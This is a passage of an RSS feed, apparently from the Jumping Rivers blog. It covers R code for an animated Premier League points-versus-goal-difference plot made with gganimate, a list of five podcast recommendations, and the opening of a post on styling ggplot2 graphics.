&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Top Half&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bottom Half&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Relegation&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Status &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_chr&lt;/span&gt;(Position, Qual),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Status &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(Status, levels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Champions League&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Europa League&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Top Half&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bottom Half&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Relegation&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(prem_total)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date Team Points GD Position Status&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2018-05-13 Man City 100 79 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2018-05-09 Man City 97 78 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2018-05-10 Man City 97 78 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2018-05-06 Man City 94 76 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2018-05-08 Man City 94 76 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2018-04-29 Man City 93 76 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that here I’m using a factor to reorganise the legend in the plot we’re about to make. We’re looking for a path of a team&amp;rsquo;s points and goal difference over a season, with a colour scheme for where they are in the table at that point. This is what that looks like for one team (here I&amp;rsquo;m using Newcastle United)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Team &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Newcastle&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(GD, Points)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Status), size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_path&lt;/span&gt;(linetype &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.4&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;NUFC Points/Goal Difference Path&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Season 2017/2018&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_brewer&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;qual&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Paired&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="Newcastle-points-gd-plot.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;Bear in mind we’re going to have 20 teams on the graph and so instead of just using points, we’re going to use labels with the team’s name on.&lt;/p&gt;
&lt;p&gt;Now, adding {gganimate} is relatively pain-free. The package comes with lots of functions titled &lt;code&gt;transition_*()&lt;/code&gt;. These dictate by what variable your gif will change. We want our gif to be over time i.e. the variable &lt;code&gt;Date&lt;/code&gt;. There is a specific &lt;code&gt;transition&lt;/code&gt; function that works with time, called &lt;code&gt;transition_time()&lt;/code&gt;. {gganimate} is also lovely in the way that we can just add these functions to regular ggplots.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(GD, Points)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_label&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Team, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Status), label.padding &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unit&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;lines&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;PL Team Points vs Goal Difference 17/18&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Date: {frame_time}&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_brewer&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;qual&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Paired&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;transition_time&lt;/span&gt;(Date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;animate&lt;/span&gt;(g, nframes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, fps &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="Premier_league_animation.gif" style="width:500px; class:image-center"&gt;
&lt;p&gt;We&amp;rsquo;ve only added one function here. Easy! If you want to split the animation up by something more arbitrary (a character variable, let&amp;rsquo;s say), then you would use &lt;code&gt;transition_states()&lt;/code&gt;. Then all that is needed is the &lt;code&gt;animate()&lt;/code&gt; function! Within &lt;code&gt;animate()&lt;/code&gt;, the &lt;code&gt;nframes&lt;/code&gt; argument is the total number of frames, whilst the &lt;code&gt;fps&lt;/code&gt; argument is the number of frames shown &lt;em&gt;per second&lt;/em&gt;. If we wanted our gif to be a bit quicker, we&amp;rsquo;d go for a higher &lt;code&gt;fps&lt;/code&gt;.&lt;/p&gt;
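&lt;p&gt;To make those two points concrete, here is a rough sketch. It uses the built-in &lt;code&gt;iris&lt;/code&gt; data rather than the Premier League data so that it is self-contained; the object &lt;code&gt;p&lt;/code&gt; and the helper &lt;code&gt;gif_duration()&lt;/code&gt; are hypothetical names. &lt;code&gt;transition_states()&lt;/code&gt; steps through the values of a categorical variable, and the length of the gif in seconds is simply &lt;code&gt;nframes&lt;/code&gt; divided by &lt;code&gt;fps&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)
library(&amp;#34;gganimate&amp;#34;)

# One state per species; {closest_state} is filled in by transition_states()
p = ggplot(iris, aes(Sepal.Length, Sepal.Width)) +
  geom_point(aes(colour = Species)) +
  labs(subtitle = &amp;#34;Species: {closest_state}&amp;#34;) +
  transition_states(Species, transition_length = 2, state_length = 1)

# Hypothetical helper: length of the rendered gif in seconds
gif_duration = function(nframes, fps) nframes / fps

gif_duration(200, 2)  # the settings used above
## [1] 100
gif_duration(200, 10) # same frames, higher fps, shorter gif
## [1] 20

# Uncomment to render; the frame count here is an arbitrary choice
# animate(p, nframes = 60, fps = 10)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;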
&lt;p&gt;That&amp;rsquo;s all for now, thanks for reading!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-gganimate-premier-league/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Podcast recommendations</title><link>https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/</link><pubDate>Wed, 29 Aug 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Anyone who has a long commute or who has to travel with work knows the importance of podcasts. Podcasts allow you to turn otherwise useless time into something both productive and interesting. In this blog post, we&amp;rsquo;ll describe some of our favourite podcasts.&lt;/p&gt;
&lt;p&gt;This list isn&amp;rsquo;t meant to be exhaustive; it&amp;rsquo;s just what we are &lt;strong&gt;currently&lt;/strong&gt; listening to - our top 5. But don&amp;rsquo;t fret, we&amp;rsquo;ve created a &lt;a href="https://jumpingrivers.github.io/podcasts/" rel="external"&gt;comprehensive&lt;/a&gt; list, so let us know if any are missing.&lt;/p&gt;
&lt;h3 id="not-so-standard-deviations"&gt;Not so Standard Deviations&lt;/h3&gt;
&lt;p&gt;A &lt;a href="https://twitter.com/nssdeviations" rel="external"&gt;data science&lt;/a&gt; podcast by Roger Peng &lt;a href="https://twitter.com/rdpeng" rel="external"&gt;@rdpeng&lt;/a&gt; and Hilary Parker &lt;a href="https://twitter.com/hspter" rel="external"&gt;@hspter&lt;/a&gt; who talk about the latest in data science and data analysis in academia and industry. They talk a lot about R and common problems in the life of a data scientist. A nice mixture of technical and light topics.&lt;/p&gt;
&lt;h3 id="grumpy-old-geeks"&gt;Grumpy Old Geeks&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;What went wrong on the internet and who&amp;rsquo;s to blame&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="http://gog.show/" rel="external"&gt;Two &amp;ldquo;elder&amp;rdquo; geeks&lt;/a&gt;, complain about the internet and tech at large. Amusing, especially for their disdain for AI. Not really data science, but general tech. Warning: sometimes the language is &amp;ldquo;adult&amp;rdquo;.&lt;/p&gt;
&lt;h3 id="dataframed"&gt;Dataframed&lt;/h3&gt;
&lt;p&gt;The official &lt;a href="https://www.datacamp.com/community/podcast" rel="external"&gt;podcast&lt;/a&gt; from DataCamp. Each episode takes the form of an interview.&lt;/p&gt;
&lt;h3 id="more-or-less"&gt;More or Less&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.bbc.co.uk/programmes/b006qshd" rel="external"&gt;Tim Harford&lt;/a&gt; explains - and sometimes debunks - the numbers and statistics used in political debate, the news and everyday life. The programme has a UK slant but covers global topics. It&amp;rsquo;s very useful for playing in the car in the presence of non-data scientists!&lt;/p&gt;
&lt;h3 id="in-our-time"&gt;In our Time&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.bbc.co.uk/programmes/b006qykl/episodes/a-z/a" rel="external"&gt;In Our Time&lt;/a&gt; is a live BBC radio discussion series exploring the history of ideas, presented by Melvyn Bragg since 15 October 1998. It covers a variety of topics, including Mathematics. Each programme lasts one hour.&lt;/p&gt;
&lt;h4 id="credits"&gt;Credits&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Photo by Austin Distel on &lt;a href="https://unsplash.com/s/photos/podcast" rel="external"&gt;Unsplash&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Styling {ggplot2} Graphics</title><link>https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/</link><pubDate>Tue, 21 Aug 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/featured.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="styling-ggplot2-graphics"&gt;Styling {ggplot2} graphics&lt;/h2&gt;
&lt;p&gt;In our &lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/"&gt;previous post&lt;/a&gt;, we demonstrated that, contrary to popular opinion, it is possible to generate attractive-looking plots using just base graphics, although we did confess that it took a lot of time and effort. In this post, we repeat the same exercise. Using the dreaded &lt;code&gt;iris&lt;/code&gt; data set, we’ll first create the default {ggplot2} graph, before applying a bit of care and attention.&lt;/p&gt;
&lt;h2 id="the-standard-ggplot-version"&gt;The standard ggplot version&lt;/h2&gt;
&lt;p&gt;The standard scatter plot is straightforward to create. Load the package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then create a scatter plot with the wonderful grey background&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ggplot2 even spells colour correctly ;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Length, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Width)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot1-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;Unlike the base R offering, the list of possible improvements to this plot is pleasingly short. Basically, it’s&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the axis labels (but they come from &lt;strong&gt;our&lt;/strong&gt; column headings)&lt;/li&gt;
&lt;li&gt;colours (red &amp;amp; blue aren’t the best combination)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So overall, pretty good. Other aspects that could be improved are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;grey background&lt;/li&gt;
&lt;li&gt;direct labels on the points&lt;/li&gt;
&lt;li&gt;starting the x-axis at 4, not 4.2&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-styling-ggplot2-r-graphics"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="styling-the-plot-using-only-ggplot2"&gt;Styling the plot using only {ggplot2}&lt;/h2&gt;
&lt;p&gt;Using only {ggplot2} (and a little bit of {dplyr} love), we can significantly and easily improve the graph. First, we’ll capitalise the legend key. I find it easier to manipulate the data directly:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;iris &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(iris, Species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_to_title&lt;/span&gt;(Species))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the data tweaked, we can get to the serious business of styling the plot. As the plot will contain a number of components, it makes sense to create intermediate objects. As the points overlap, we&amp;rsquo;ll change from &lt;code&gt;geom_point()&lt;/code&gt; to &lt;code&gt;geom_jitter()&lt;/code&gt;. This geom wiggles the points and allows us to see overlapping points:&lt;/p&gt;
